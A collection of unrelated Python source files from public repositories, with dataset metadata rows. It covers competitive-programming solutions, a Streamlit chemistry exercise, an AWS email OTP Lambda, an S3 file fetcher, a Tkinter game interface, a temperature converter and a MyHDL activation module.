db.add_job(job_content)
| mehdidc/zoo | train.py | train.py | py | 14,630 | python | en | code | 0 | github-code | 90 |
13454650838 | # https://leetcode.com/problems/kth-smallest-element-in-a-bst/
from typing import Optional, List
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
def bst_to_list(node: Optional[TreeNode], nums: List[int]) -> None:
if not node:
return
bst_to_list(node.left, nums)
nums.append(node.val)
bst_to_list(node.right, nums)
class Solution:
def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:
nums = []
bst_to_list(root, nums)
return nums[k-1]
| petercrackthecode/LeetcodePractice | kth_smallest_element_in_bst/my_solution.py | my_solution.py | py | 640 | python | en | code | 1 | github-code | 90 |
43032629147 | t = int(input())
def getLongestSubsequence(lcs_matrix,str1,str2,x,y):
revseq = ""
while (x>0) and (y>0):
if str1[x-1] != str2[y-1]:
if lcs_matrix[x-1][y] == lcs_matrix[x][y]: x -= 1
elif lcs_matrix[x][y-1] == lcs_matrix[x][y]: y -= 1
else:
revseq += str1[x-1]
x -= 1
y -= 1
return revseq[::-1]
while t:
x, y = map(int, input().split(" "))
first = input()
second = input()
t -= 1
lcs = [[0] * (y + 1) for _ in range(x + 1)]
for i in range(x + 1):
for j in range(y + 1):
if (not i) or (not j):
None
elif first[i - 1] == second[j - 1]:
lcs[i][j] = lcs[i - 1][j - 1] + 1
else:
lcs[i][j] = max(lcs[i - 1][j], lcs[i][j - 1])
print("Longets Common SubSequence length: ",lcs[x][y])
print("Longets Common SubSequence: ",getLongestSubsequence(lcs,first,second,x,y)) | kaustav1808/Data-Structure-And-Algorithm-Implementation | Dynamic Programming/longestCommonSubSequence.py | longestCommonSubSequence.py | py | 972 | python | en | code | 0 | github-code | 90 |
5544444752 | import sys
from collections import deque
si = sys.stdin.readline
N, P = map(int, si().split())
def bfs():
q = deque()
q.append(N)
visited = [0 for _ in range(1000000 + 1)]
visited[N] += 1 # 방문처리
while q:
val = q.popleft()
val = str(val)
if val == 3:
break
number_list_str = list(val)
new_val = 0
for number_str in number_list_str:
new_val = new_val + pow(int(number_str), P)
if visited[new_val] <= 2:
q.append(new_val)
visited[new_val] += 1
print(visited.count(1))
return
bfs() | SteadyKim/Algorism | language_PYTHON/백준/BJ2331.py | BJ2331.py | py | 635 | python | en | code | 0 | github-code | 90 |
33153442746 | import streamlit as st
import numpy as np
import pandas as pd
import plotly.express as px
def run():
st.markdown("# How does data become a line?")
st.markdown("""
Alice measured the rate of reaction for the decomposition of hydrogen peroxide
at several temperatures. What should she plot to get a line?
""")
T_celsius = np.array([0, 20, 40, 60, 80])
T_kelvin = T_celsius + 273.15
A = 2.432e5 # Exponential prefactor
Ea = 68.9e3 # Activation energy
R = 8.3145 # Ideal gas constant
np.random.seed(239049034)
k = A * np.exp(-Ea/(R*T_kelvin)) * (1+np.random.randn(5)*0.15)
ln_k = np.log(k)
T_inverse = 1/T_kelvin
log_T = np.log(T_kelvin)
df = pd.DataFrame.from_dict({"T (°C)": T_celsius, "k (s⁻¹)": k,
"ln(k/s⁻¹)": ln_k, "1/k (s)": 1/k,
"log(T/K)": log_T,
"1/T (K⁻¹)": T_inverse,
"T (K)": T_kelvin})
st.dataframe(df[["T (°C)", "k (s⁻¹)"]].style
.format("{:.2e}", subset="k (s⁻¹)")
.format("{:.1f}", subset="T (°C)"))
y_options = [x for x in df.columns if 'k' in x]
x_options = [x for x in df.columns if 'T' in x]
y_axis = st.selectbox("Y axis", y_options)
x_axis = st.selectbox("X axis", x_options)
fig = px.scatter(df, x=x_axis, y=y_axis, trendline='ols')
results = px.get_trendline_results(fig)
results = results.px_fit_results[0]
b, m = results.params
R_squared = results.rsquared
st.write(f"""Trendline
y = {m:.2f}x + {b:.2f}
R² = {R_squared:.4f}
""")
st.plotly_chart(fig)
st.markdown("""
### Questions
1. What is the activation energy for the reaction in kJ/mol?
""")
correct_Ea = 8196.29*8.3145 / 1000
Ea_response = st.number_input("Activation energy (kJ/mol)", value=0.0)
if Ea_response != 0.0 and abs(Ea_response-correct_Ea) > 0.2:
st.write("Incorrect. Try again.")
elif abs(Ea_response-correct_Ea) < 0.2:
st.write("Correct!")
st.markdown("2. What is the pre-exponential factor?")
A_response = st.number_input("Pre-exponential factor:", value=0.0, format="%2e")
correct_A = np.exp(12.07)
if A_response != 0.0 and abs(A_response-correct_A) > 1e4:
st.write("Incorrect. Try again.")
elif abs(A_response-correct_A) < 0.2e4:
st.write("Correct!")
if __name__ == '__main__':
run() | ryanpdwyer/pchem | apps/arrhen.py | arrhen.py | py | 2,482 | python | en | code | 0 | github-code | 90 |
74543542695 | import json
import boto3
import json
import boto3
import random
import string
import datetime
from custom_encoder import CustomEncoder, error_response
email_client = boto3.client("ses")
dynamo_client = boto3.resource(service_name='dynamodb', region_name='us-east-1')
product_table_email = dynamo_client.Table('email_otp')
def lambda_handler(event, context):
try:
print("requestBody-", event)
otp_state = event.get('otpstate')
emailid = event.get('emailid')
if (otp_state == 'SENDOTP' or otp_state == 'RESEND'):
randnum = random.randint(100000, 999999)
subject = "OTP VERIFICATION"
message = "Your otp is "
if emailid:
body = """<div style="font-family: Helvetica,Arial,sans-serif;min-width:1000px;overflow:auto;line-height:2">
<div style="margin:50px auto;width:70%;padding:20px 0">
<div style="border-bottom:1px solid #eee">
<a href="" style="font-size:1.4em;color: #00466a;text-decoration:none;font-weight:600">INTELLILANG</a>
</div>
<p style="font-size:1.1em">Hi,</p>
<p>Thank you for choosing INTELLILANG. Use the following OTP to complete your Sign Up procedures. OTP is valid for 5 minutes</p>
<h2 style="background: #00466a;margin: 0 auto;width: max-content;padding: 0 10px;color: #fff;border-radius: 4px;">{0}</h2>
<p style="font-size:0.9em;">Regards,<br />INTELLILANG</p>
<hr style="border:none;border-top:1px solid #eee" />
<div style="float:right;padding:8px 0;color:#aaa;font-size:0.8em;line-height:1;font-weight:300">
<p>INTELLILANG</p>
</div>
</div>
</div>
""".format(randnum)
product_table_email.put_item(Item={'email_id': emailid, 'otp': randnum})
message_email = {"Subject": {"Data": subject}, "Body": {"Html": {"Data": body}}}
email_client.send_email(Source="saisurajch123@gmail.com", Destination={"ToAddresses": [emailid]},
Message=message_email)
print(randnum)
response = "OTP SENT SUCCESSFULLY"
elif (otp_state == 'VERIFY'):
otp_verify = event['otp']
dbresponce = product_table_email.get_item(Key={'email_id': emailid})
print("dbresponce", dbresponce)
if "Item" in dbresponce:
otp = dbresponce["Item"]["otp"]
print(otp)
if (str(otp) == str(otp_verify)):
response = "verified succesfully"
else:
response = "OTP invalid"
return {
'statusCode': 200,
'body': {"message": response},
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*'
}
}
except Exception as e:
print(e)
return error_response(e)
| NovoSphere/Login-Sigup-with-React-and-AWS | AWS/email.py | email.py | py | 3,197 | python | en | code | 0 | github-code | 90 |
9301503264 | import datetime
import logging
import os
import urllib.parse
from typing import Any, Dict, Generator, List, Tuple
from .base import Fetcher
logger = logging.getLogger(__name__)
class S3Fetcher(Fetcher):
def __init__(
self, storage_config: Dict[str, Any], storage_paths: List[str], local_dir: str
) -> None:
import boto3
from determined.common.storage import boto3_credential_manager
boto3_credential_manager.initialize_boto3_credential_providers()
self.s3 = boto3.resource(
"s3",
endpoint_url=storage_config.get("endpoint_url"),
aws_access_key_id=storage_config.get("access_key"),
aws_secret_access_key=storage_config.get("secret_key"),
)
self.client = self.s3.meta.client
self.bucket_name = str(storage_config["bucket"])
self.local_dir = local_dir
self.storage_paths = storage_paths
self._file_records = {} # type: Dict[str, datetime.datetime]
def _find_keys(self, prefix: str) -> Generator[Tuple[str, datetime.datetime], None, None]:
logger.debug(f"Listing keys in bucket '{self.bucket_name}' with prefix '{prefix}'")
prefix = urllib.parse.urlparse(prefix).path.lstrip("/")
paginator = self.client.get_paginator("list_objects_v2")
page_iterator = paginator.paginate(Bucket=self.bucket_name, Prefix=prefix)
page_count = 0
for page in page_iterator:
page_count += 1
for s3_obj in page.get("Contents", []):
yield (s3_obj["Key"], s3_obj["LastModified"])
if page_count > 1:
logger.info(f"Fetched {page_count} number of list_objects_v2 pages")
def fetch_new(self) -> int:
"""Fetches changes files found in storage paths to local disk."""
new_files = []
# Look at all files in our storage location.
for storage_path in self.storage_paths:
for filepath, mtime in self._find_keys(storage_path):
prev_mtime = self._file_records.get(filepath)
if prev_mtime is not None and prev_mtime >= mtime:
continue
new_files.append(filepath)
self._file_records[filepath] = mtime
# Download the new or updated files.
for filepath in new_files:
local_path = os.path.join(self.local_dir, self.bucket_name, filepath)
dir_path = os.path.dirname(local_path)
os.makedirs(dir_path, exist_ok=True)
with open(local_path, "wb") as local_file:
self.client.download_fileobj(self.bucket_name, filepath, local_file)
logger.debug(f"Downloaded file to local: {local_path}")
return len(new_files)
| JorgedDiego/determined-ai | harness/determined/tensorboard/fetchers/s3.py | s3.py | py | 2,764 | python | en | code | 0 | github-code | 90 |
16404050149 | if __name__ == '__main__':
test_cnt = int(input())
for t in range(test_cnt):
digits = [int(digit) for digit in input()]
length = len(digits)
queue = []
if length%2 == 0:
queue.append((0,length-1))
else:
queue.append((0,length-2))
queue.append((1,length-1))
result = 0
while result == 0 and len(queue) != 0:
r = queue.pop(0)
if(r[0]>=r[1]):
continue
mid = int((r[0]+r[1])/2)
left = sum(digits[r[0]:mid+1])
right = sum(digits[mid+1:r[1]+1])
if sum(digits[r[0]:mid+1]) == sum(digits[mid+1:r[1]+1]):
result = r[1] - r[0] + 1
else:
if((r[0]+1,r[1]-1) not in queue):
queue.append((r[0]+1,r[1]-1))
if((r[0]+2,r[1]) not in queue):
queue.append((r[0]+2,r[1]))
if((r[0],r[1]-2) not in queue):
queue.append((r[0],r[1]-2))
print(result) | HacoK/SolutionsOJ | 3-11/solution.py | solution.py | py | 1,056 | python | en | code | 3 | github-code | 90 |
13859571082 | import collections
import operator
def getDistance(startX, endX, startY, endY):
# Get difference of every point with every co-ordinate
dist={}
for i in range(startX, endX+1):
for j in range(startY, endY+1):
for index,coord in coords.items():
if (i,j) not in dist.keys():
dist[(i,j)] = [abs(coord[0]-i) + abs(coord[1]-j)]
else:
dist[(i,j)].append(abs(coord[0]-i) + abs(coord[1]-j))
# Compare dist with the actual coordinates and find closest
d2 = {}
for k,v in dist.items():
d1 = collections.Counter(v)
if d1[min(v)] > 1:
d2[k] = '.'
#print(k,v, min(v), d1[min(v)])
else:
d2[k] = v.index(min(v))
#print(k,v, min(v))
#print('-' * 10)
return d2
#Part 1
t1 = []
t2 = []
coords = {}
# Get coordinates in right format, as well as the range
#with open('dump') as f:
with open('6.txt') as f:
count = 0
for row in f:
l1 = row.rstrip().replace(' ','').split(',')
t1.append(l1[0])
t2.append(l1[1])
coords[count] = (int(l1[0]), int(l1[1]))
count += 1
startX=0
startY=0
endX=int(max(t1))
endY=int(max(t2))
print("MaxX:", endX, "MaxY", endY)
print('-' * 10)
d2 = getDistance(startX, endX, startY, endY)
print(d2.keys())
sys.exit(0)
#Start with the column immediately to the right of endX. Once you're done calculating compare it with the values you already have for (endX, y)
match = 1
while match == 1:
newstartX = endX + 1
newendX = newstartX
newstartY = 0
newendY = endY
t2 = getDistance(newstartX, newendX, newstartY, newendY)
newrc = False
for y in range(0, endY+1):
if d2[(endX, y)] == t2[(newstartX, y)]:
#print("Match: ", (endX, y), d2[(endX,y)], t2[(newstartX, y)])
match = 0
else:
#print("No match:", d2[(endX,y)], t2[(newstartX, y)])
#endX = newendX
match = 1
newrc = True
#Update dictionary by adding new column
d2[(newstartX, y)] = t2[(newstartX, y)]
if newrc:
endX = newendX
#Next go to the left most column where x becomes -ve. Once you're done here, compare it with what you have for (startX, y)
match = 1
while match == 1:
newstartX = startX - 1
newendX = newstartX
newstartY = 0
newendY = endY
t2 = getDistance(newstartX, newendX, newstartY, newendY)
newrc = False
for y in range(0, endY+1):
if d2[(startX, y)] == t2[(newstartX, y)]:
#print("Match: ", d2[(startX,y)], t2[(newstartX, y)])
match = 0
else:
#endX = newendX
match = 1
newrc = True
#Update dictionary by adding new column
d2[(newstartX, y)] = t2[(newstartX, y)]
if newrc:
endX = newendX
#Now go to the bottom most row where y becomes +ve. Once you're done here, compare it with what you have for (x, endY)
match = 1
while match == 1:
newstartX = 0
newendX = endX
newstartY = endY + 1
newendY = newstartY
t2 = getDistance(newstartX, newendX, newstartY, newendY)
newrc = False
for x in range(0, endX+1):
if d2[(x, endY)] == t2[(x, newendY)]:
#print("Match: ", d2[(endX,y)], t2[(newstartX, y)])
match = 0
else:
#endY = newendY
match = 1
newrc = True
#Update dictionary by adding new column
d2[(x, newstartY)] = t2[(x, newstartY)]
if newrc:
endY = newendY
#Now go to the top most row where y becomes -ve. Once you're done here, compare it with what you have for (x, startY)
match = 1
while match == 1:
newstartX = 0
newendX = endX
newstartY = startY - 1
newendY = newstartY
newrc = False
t2 = getDistance(newstartX, newendX, newstartY, newendY)
for x in range(0, endX+1):
if d2[(x, startY)] == t2[(x, newstartY)]:
#print("Match: ", d2[(endX,y)], t2[(newstartX, y)])
match = 0
else:
match = 1
newrc = True
#Update dictionary by adding new column
d2[(x, newstartY)] = t2[(x, newstartY)]
if newrc:
endY = newendY
# Track infinites by looking at the border coordinates
final = {}
infinite = []
for k,v in d2.items():
print(k,v)
if v != '.':
if k[0] == 0 or k[0] == endX or k[1] == 0 or k[1] == endY:
if v not in infinite:
infinite.append(v)
if v not in final.keys():
final[v] = 1
else:
final[v] += 1
#print('-' * 10)
#print("Infinite", infinite)
#print('-' * 10)
#for k,v in final.items():
# print(k, v)
#print('-' * 10)
count= sorted(final.items(), reverse=True, key=operator.itemgetter(1))
for entry in count:
#print(entry)
if entry[0] not in infinite:
print(entry[1])
break
else:
continue
| arvinddoraiswamy/blahblah | adventofcode/2018/6.py | 6.py | py | 4,971 | python | en | code | 6 | github-code | 90 |
73114691495 | import tkinter as tk
import tkinter.font as tkFont
class UiManager:
def __init__(self, window, handle_entry_logic_callback):
self.handle_entry_logic_callback = handle_entry_logic_callback
print(f"Debug: handle_entry_logic_callback is {self.handle_entry_logic_callback}")
self.window = window
# Call the function to get the values
self.custom_font, self.bg_color, self.fg_color = self.define_custom_font_and_colors()
# Load the startup graphic
self.startup_image = tk.PhotoImage(file="art/ggTitle.png")
# Create the label and place the image
self.startup_label = tk.Label(window, image=self.startup_image)
self.startup_label.place(x=0, y=0, relwidth=1, relheight=1) # Cover the whole window
# Set a minimum window size (width x height)
window.minsize(800, 600)
# Set background color
window.configure(bg=self.bg_color)
# Create a frame to hold the text area and the scrollbar
self.text_frame = tk.Frame(window, bg=self.bg_color)
self.text_frame.grid(column=0, row=0, padx=10, pady=10, sticky='nsew')
# Create a scrollable text display area
self.text_area = tk.Text(self.text_frame, wrap=tk.WORD, bg=self.bg_color, fg=self.fg_color, font=self.custom_font)
self.text_area.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
# Create a scrollbar and attach it to text_area
self.scrollbar = tk.Scrollbar(self.text_frame, command=self.text_area.yview, bg=self.bg_color)
self.scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
# Create a multi-line text input field
self.input_field = tk.Text(self.window, wrap=tk.WORD, width=100, height=4, bg=self.bg_color, fg=self.fg_color, font=self.custom_font)
self.input_field.grid(column=0, row=1, padx=10, pady=10, sticky='w')
# Bind the Enter key to handle_entry method
self.input_field.bind("<Return>", lambda event, self=self: self.handle_entry(event, self.handle_entry_logic_callback))
# Create a Submit button
self.submit_button = tk.Button(window, text="Submit", command=lambda: self.handle_entry(None, self.handle_entry_logic_callback), bg=self.bg_color, fg=self.fg_color, font=self.custom_font)
self.submit_button.grid(column=0, row=2, padx=10, pady=10, sticky='w')
# Define text tags for coloring
self.text_area.tag_config('player_tag', foreground='green')
self.text_area.tag_config('dm_tag', foreground='yellow')
self.text_area.tag_config('sys_tag', foregroun='orange')
# Define custom font and colors
def define_custom_font_and_colors(self):
custom_font = tkFont.Font(family="Helvetica", size=12)
bg_color = '#2E2E2E'
fg_color = '#FFFFFF'
return custom_font, bg_color, fg_color
def initialize_window(self, width, height):
self.window.geometry(f"{width}x{height}")
self.window.minsize(800, 600)
self.window.title("Gauntlets and Goblins")
def display_text(self, text, tag=None):
if tag:
self.text_area.insert(tk.END, text, tag)
else:
self.text_area.insert(tk.END, text)
def handle_entry(self, event, callback):
print("handle_entry is called") # Debugging line
print(f"Event Info: {event}") # Debugging line
user_text = self.input_field.get("1.0", tk.END).strip()
print(f"User Text: {user_text}") # Debugging line
self.input_field.delete("1.0", tk.END)
callback(user_text)
def add_character_buttons(self, num_buttons, callback):
for i in range(num_buttons):
button = tk.Button(self.window, text=f"P {i + 1}", command=lambda i=i: callback(i), bg=self.bg_color, fg=self.fg_color, font=self.custom_font)
button.grid(column=0, row=i + 3, padx=10, pady=10, sticky='w')
def display_dm_message(self, message, tag='dm_tag'):
self.text_area.insert(tk.END, "GM: ", tag)
self.text_area.insert(tk.END, f"{message}\n\n")
def display_sys_message(self, message, tag='sys_tag'):
self.text_area.insert(tk.END, "System: ", tag)
self.text_area.insert(tk.END, f"{message}\n\n")
def add_character_buttons_and_configure_grid(self, num_buttons, callback):
# Use the instance to create or open character sheets
self.add_character_buttons(num_buttons, callback)
# Set weight and minimum size for rows and columns
self.window.grid_rowconfigure(0, weight=1, minsize=400) # Text frame
self.window.grid_rowconfigure(1, weight=0, minsize=100) # Input field
self.window.grid_rowconfigure(2, weight=0, minsize=50) # Submit button
# Set weight and minimum size for the rows containing the buttons
for i in range(3, num_buttons + 3): # Loop through the rows where buttons are placed
self.window.grid_rowconfigure(i, weight=0, minsize=50)
# Set weight for the column
self.window.grid_columnconfigure(0, weight=1)
| ryancarolina/ai-dungeon-master | UiManager.py | UiManager.py | py | 5,126 | python | en | code | 0 | github-code | 90 |
29544035647 | # -*- coding: utf-8 -*-
# @Time : 2022/2/20 10:29
# @Author : 模拟卷
# @Github : https://github.com/monijuan
# @CSDN : https://blog.csdn.net/qq_34451909
# @File : 6014AC. 构造限制重复的字符串.py
# @Software: PyCharm
# ===================================
"""给你一个字符串 s 和一个整数 repeatLimit ,用 s 中的字符构造一个新字符串 repeatLimitedString ,使任何字母 连续 出现的次数都不超过 repeatLimit 次。你不必使用 s 中的全部字符。
返回 字典序最大的 repeatLimitedString 。
如果在字符串 a 和 b 不同的第一个位置,字符串 a 中的字母在字母表中出现时间比字符串 b 对应的字母晚,则认为字符串 a 比字符串 b 字典序更大 。如果字符串中前 min(a.length, b.length) 个字符都相同,那么较长的字符串字典序更大。
示例 1:
输入:s = "cczazcc", repeatLimit = 3
输出:"zzcccac"
解释:使用 s 中的所有字符来构造 repeatLimitedString "zzcccac"。
字母 'a' 连续出现至多 1 次。
字母 'c' 连续出现至多 3 次。
字母 'z' 连续出现至多 2 次。
因此,没有字母连续出现超过 repeatLimit 次,字符串是一个有效的 repeatLimitedString 。
该字符串是字典序最大的 repeatLimitedString ,所以返回 "zzcccac" 。
注意,尽管 "zzcccca" 字典序更大,但字母 'c' 连续出现超过 3 次,所以它不是一个有效的 repeatLimitedString 。
示例 2:
输入:s = "aababab", repeatLimit = 2
输出:"bbabaa"
解释:
使用 s 中的一些字符来构造 repeatLimitedString "bbabaa"。
字母 'a' 连续出现至多 2 次。
字母 'b' 连续出现至多 2 次。
因此,没有字母连续出现超过 repeatLimit 次,字符串是一个有效的 repeatLimitedString 。
该字符串是字典序最大的 repeatLimitedString ,所以返回 "bbabaa" 。
注意,尽管 "bbabaaa" 字典序更大,但字母 'a' 连续出现超过 2 次,所以它不是一个有效的 repeatLimitedString 。
提示:
1 <= repeatLimit <= s.length <= 105
s 由小写英文字母组成
"""
from leetcode_python.utils import *
class Solution:
def repeatLimitedString(self, s: str, repeatLimit: int) -> str:
res = ''
cnt = Counter(s)
# print(cnt)
cnt = [list(x) for x in sorted(cnt.items(),key=lambda x:x[0])]
cnt.reverse()
l = len(cnt)
i=0
while i<l:
c, n = cnt[i]
if n==0:
i+=1
elif n<=repeatLimit:
res+=n*c
i+=1
elif i<len(cnt):
j=i+1
while j<l and cnt[j][1]==0:j+=1
if j==l:break
res = res+ repeatLimit*c + cnt[j][0]
cnt[i][1]-=repeatLimit
cnt[j][1]-=1
if i<l and cnt[i][0]: res +=repeatLimit*cnt[i][0]
return res
def test(data_test):
s = Solution()
data = data_test # normal
# data = [list2node(data_test[0])] # list转node
return s.repeatLimitedString(*data)
def test_obj(data_test):
result = [None]
obj = Solution(*data_test[1][0])
for fun, data in zip(data_test[0][1::], data_test[1][1::]):
if data:
res = obj.__getattribute__(fun)(*data)
else:
res = obj.__getattribute__(fun)()
result.append(res)
return result
if __name__ == '__main__':
datas = [
["cczazcc",3],
# ["aababab",2],
]
for data_test in datas:
t0 = time.time()
print('-' * 50)
print('input:', data_test)
print('output:', test(data_test))
print(f'use time:{time.time() - t0}s')
| monijuan/leetcode_python | code/competition/2022/20220220/6014AC. 构造限制重复的字符串.py | 6014AC. 构造限制重复的字符串.py | py | 3,709 | python | zh | code | 0 | github-code | 90 |
20297921984 | import tkinter as tk
def converter():
i=var1.get()
o=var2.get()
val=int(entry_input.get())
op_value=0
entry_output.delete(0,tk.END)
if i=='c':
if o=='f':
op_value=(val*(9/5))+32
elif o=='k':
op_value=val+273.15
else:
op_value=val
elif i=='f':
if o=='c':
op_value=(val-32)*5/9
elif o=='k':
op_value= (val-32)*(5/9 ) + 273.15
else:
op_value=val
elif i=='k':
if o=='c':
op_value=val-273.15
elif o=='f':
op_value=(val-273.15)*9/5+32
else:
op_value=val
entry_output.insert(0,op_value)
window= tk.Tk()
window.geometry('600x300')
label1=tk.Label(text="Enter the Input and choose the input scale :")
entry_input= tk.Entry()
var1=tk.StringVar(value='c')
ip_c=tk.Radiobutton(text="centigrade",variable=var1,value='c')
ip_f=tk.Radiobutton(text="fahreheit",variable=var1,value='f')
ip_k=tk.Radiobutton(text="kelvin",variable=var1,value='k')
label1.grid(row=0,column=0,columnspan=2)
entry_input.grid(row=1,column=2)
ip_c.grid(row=1,column=4)
ip_f.grid(row=1,column=5)
ip_k.grid(row=1,column=6)
#output
label2=tk.Label(text="Choose the output format :")
entry_output=tk.Entry()
var2=tk.StringVar(value='x')
op_c=tk.Radiobutton(text="centigrade",variable=var2,value='c')
op_f=tk.Radiobutton(text="fahreheit",variable=var2,value='f')
op_k=tk.Radiobutton(text="kelvin",variable=var2,value='k')
submit=tk.Button(text='ENTER',command=converter)
op_label=tk.Label(text="Output :")
brk=tk.Label(text='')
brk2=tk.Label(text='')
brk3=tk.Label(text='')
label2.grid(row=2,column=0,columnspan=1)
entry_output.grid(row=8,column=2)
brk2.grid(row=3)
op_c.grid(row=4,column=1)
op_f.grid(row=4,column=2)
op_k.grid(row=4,column=3)
brk3.grid(row=5)
brk.grid(row=7)
submit.grid(row=6,column=2)
op_label.grid(row=8,column=1)
window.mainloop()
| shiva341/python-projects | tinkter.py | tinkter.py | py | 1,981 | python | en | code | 0 | github-code | 90 |
17978127939 | import queue
import sys
sys.setrecursionlimit(10 ** 7)
N = int(input())
ab = []
for _ in range(N - 1):
ab.append(tuple(map(int, input().split())))
G = [[] for _ in range(N + 1)]
for el in ab:
a, b = el
G[a].append(b)
G[b].append(a)
seen = [False] * (N + 1)
todo = queue.Queue()
dist = [0] * (N + 1)
prev = [None] * (N + 1)
def bfs(parent):
seen[parent] = True
for child in G[parent]:
if seen[child] == False:
todo.put(child)
dist[child] = dist[parent] + 1
prev[child] = parent
if not todo.empty():
bfs(todo.get())
bfs(1)
#print(dist)
#print(prev)
min_dist = dist[N]
#print(min_dist)
route = []
temp = N
for _ in range(min_dist + 1):
route.append(temp)
temp = prev[temp]
#print(route)
seen = [False] * (N + 1)
def dfs(parent):
seen[parent] = True
cnt[0] += 1
for child in G[parent]:
if seen[child] == False:
dfs(child)
S = route[(min_dist + 1) // 2 - 1]
F = route[(min_dist + 1) // 2]
seen[S] = True
seen[F] = True
cnt = [0]
dfs(S)
arround_S = cnt[0]
cnt = [0]
dfs(F)
arround_F = cnt[0]
#print(arround_N, arround_1)
if arround_F > arround_S:
print('Fennec')
else:
print('Snuke')
| Aasthaengg/IBMdataset | Python_codes/p03660/s458913990.py | s458913990.py | py | 1,222 | python | en | code | 0 | github-code | 90 |
18999055483 | import myhdl
from avalon_buses import PipelineST
from common_functions import conditional_reg_assign, simple_wire_assign, simple_reg_assign
class Activation():
def __init__( self ,
DATAWIDTH = 32,
CHANNEL_WIDTH = 1,
INIT_DATA = 0):
self.DATAWIDTH = DATAWIDTH
self.CHANNEL_WIDTH = CHANNEL_WIDTH
self.INIT_DATA = INIT_DATA
# Io Signals
self.pipeST_i = PipelineST ( self.DATAWIDTH, self.CHANNEL_WIDTH, self.INIT_DATA )
self.pipeST_o = PipelineST ( self.DATAWIDTH, self.CHANNEL_WIDTH, self.INIT_DATA )
# Internal Signals
self.classifier = PipelineST ( self.DATAWIDTH, self.CHANNEL_WIDTH, self.INIT_DATA )
# Reset value to incorporate float and intbv formats
self.zero = 0.0 if ( isinstance ( self.INIT_DATA, float ) ) else 0
self.one = 1.0 if ( isinstance ( self.INIT_DATA, float ) ) else 1
# Use simple step activation function. if x <= 0, prob=0 else prob=1
@myhdl.block
def top( self ,
reset ,
clk ,
pipeST_i ,
pipeST_o ):
# Simple Step Activation Function
@myhdl.always(clk.posedge, reset.posedge)
def activation_process():
if reset: # Synchronous reset_acc
self.classifier.data.next = self.zero
elif (pipeST_i.valid == 1):
# if data > 0, prob= 1 else 0
self.classifier.data.next = self.one if ( pipeST_i.data > self.zero ) else self.zero
else:
self.classifier.data.next = self.classifier.data
# Outputs
data = simple_wire_assign ( pipeST_o.data , self.classifier.data )
sop = conditional_reg_assign ( reset , clk , pipeST_o.sop , 0, pipeST_i.valid , pipeST_i.sop )
eop = conditional_reg_assign ( reset , clk , pipeST_o.eop , 0, pipeST_i.valid , pipeST_i.eop )
valid = simple_reg_assign ( reset , clk , pipeST_o.valid , 0, pipeST_i.valid )
channel = simple_reg_assign ( reset , clk , pipeST_o.channel , 0, pipeST_i.channel )
return myhdl.instances()
| krsheshu/luttappi | lib/frameworks/activation/myhdl/activation.py | activation.py | py | 2,590 | python | en | code | 1 | github-code | 90 |
44554577427 | """
Get Maximum Gold
In a gold mine grid of size m x n, each cell in this mine has an integer representing the amount of gold in that cell, 0 if it is empty.
Return the maximum amount of gold you can collect under the conditions:
- Every time you are located in a cell you will collect all the gold in that cell.
- From your position, you can walk one step to the left, right, up, or down.
- You can't visit the same cell more than once.
- Never visit a cell with 0 gold.
- You can start and stop collecting gold from any position in the grid that has some gold.
Understand
- Find the path that will have the max sum
- Can only do one step in left, right, down, up
- Can't visit a 0 cell
Input = [[0,6,0],
[5,8,7],
[0,9,0]]
Output = 9 -> 8 -> 7 = 24
Input = [[1,0,7],
[2,0,6],
[3,4,5],
[0,3,0],
[9,0,20]]
Output = 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 = 28
Match
- DFS
Plan
- iterate through the grid, call dfs on all values that are >0
- find max path from each starting point, save max sum
Implement
Review
Input = [[0,6,0],
[5,8,7],
[0,9,0]]
Start at 6
- go to 8
- max((6,8,7), (6,8,5) , (6,8,9)) = 23
Start at 5
- go to 8
- max((5,8,7), (5,8,6) , (5,8,9)) = 22
Start at 8
- max((8,7), (8,6) , (8,9), (8,5)) = 17
Start at 7
- go to 8
- max((7,8,9), (7,8,5) , (7,8,6)) = 24
Start at 9
- go to 8
- max((9,8,7), (9,8,6) , (9,8,5)) = 24
Return 24
Evaluate
- Time Complexity: O((n*m) * 3^(n*m)), iterate through entire grid and calling dfs which we can visit up to 3 neighbors (excluding the origin point)
- Space Complexity: O(n*m), dfs stack depth can be up to the size of the grid
"""
def getMaximumGold(grid):
maxGold = 0
row = len(grid)
col = len(grid[0])
def dfs(i,j):
gold = grid[i][j]
# assign it 0 so you don't visit it again
grid[i][j] = 0
result = 0
# go through each direction and get the max sum from the directions
for x,y in [(i+1, j), (i-1,j), (i, j+1), (i,j-1)]:
if 0 <= x < row and 0 <= y < col and grid[x][y] > 0:
result = max(result, dfs(x,y))
# assign it back to the original value to do dfs with other origin points
grid[i][j] = gold
return result + gold
for i in range(row):
for j in range(col):
maxGold = max(maxGold, dfs(i,j))
return maxGold
print("Expected Output: ", 24)
print("Actual Output: ", getMaximumGold([[0,6,0],
[5,8,7],
[0,9,0]]))
print("Expected Output: ", 28)
print("Actual Output: ", getMaximumGold([[1,0,7],
[2,0,6],
[3,4,5],
[0,3,0],
[9,0,20]])) | kpham841/LeetCode_Python | Matrix/Get_Max_Gold.py | Get_Max_Gold.py | py | 2,671 | python | en | code | 0 | github-code | 90 |
18544286859 | import sys
N, C = map(int, sys.stdin.readline().split())
sushi_set = []
for i in range(N):
x, v = map(int, sys.stdin.readline().split())
sushi_set.append((x, v))
sushi_set.sort()
ans = -1
# 方向転換は一回まででと考えて良いのではないか?
# right
right = [0 for _ in range(N)]
max_n = -float("inf")
energy = 0
right_back = [0 for _ in range(N)]
for i, (x, v) in enumerate(sushi_set):
energy += v
if energy - x > max_n:
max_n = energy - x
right[i] = max_n
right_back[i] = energy - 2 * x
# left
left = [0 for _ in range(N)]
max_n = -float("inf")
energy = 0
left_back = [0 for _ in range(N)]
for i, (x, v) in enumerate(sushi_set[::-1]):
energy += v
if energy - (C - x) > max_n:
max_n = energy - (C - x)
left[i] = max_n
left_back[i] = energy - 2 * (C - x)
# print("right", right)
# print("right_back", right_back)
# print("left", left)
# print("left_back", left_back)
ans = max(max(right), max(left))
# print(ans)
# right -> left
for i in range(N-1):
ans = max(ans, right_back[i] + left[N-2-i])
# left -> right
for i in range(N-1):
ans = max(ans, left_back[i] + right[N-2-i])
